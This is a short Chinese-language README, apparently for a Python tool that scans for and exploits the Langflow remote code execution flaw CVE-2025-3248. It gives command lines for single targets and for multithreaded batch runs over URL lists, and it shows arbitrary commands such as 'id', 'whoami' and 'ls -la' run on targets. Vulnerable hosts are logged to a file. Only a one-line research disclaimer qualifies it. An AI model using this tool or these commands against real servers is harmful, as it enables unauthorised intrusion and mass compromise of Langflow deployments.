一个用于扫描和利用CVE-2025-3248漏洞的Python工具,该漏洞允许在Langflow应用程序中实现远程代码执行(RCE)。
pip install requests
python cve-2025-3248.py http://target:port
python cve-2025-3248.py http://target:port -c "id"
python cve-2025-3248.py -f urls.txt
python cve-2025-3248.py -f urls.txt -c "whoami"
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v
url: 目标URL (例如: http://10.10.10.1:7860)-f, --file: 包含URL列表的文件,每行一个URL-c, --cmd: 要执行的命令 (例如: id, whoami)--timeout: 请求超时时间,默认10秒-t, --threads: 批量扫描的线程数,默认10-v, --verbose: 详细模式,显示原始响应python cve-2025-3248.py http://192.168.1.100:7860
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"
创建文件 targets.txt:
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860
然后运行:
python cve-2025-3248.py -f targets.txt
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5
[+] 成功执行[-] 失败或错误[!] 警告信息[*] 信息输出成功扫描的目标会保存到 vulnerable_targets.txt 或 vulnerable_targets_{command}.txt 文件中。
此工具仅用于安全研究和教育目的。使用者应对其使用行为负责。未经授权对系统进行测试可能违反法律法规。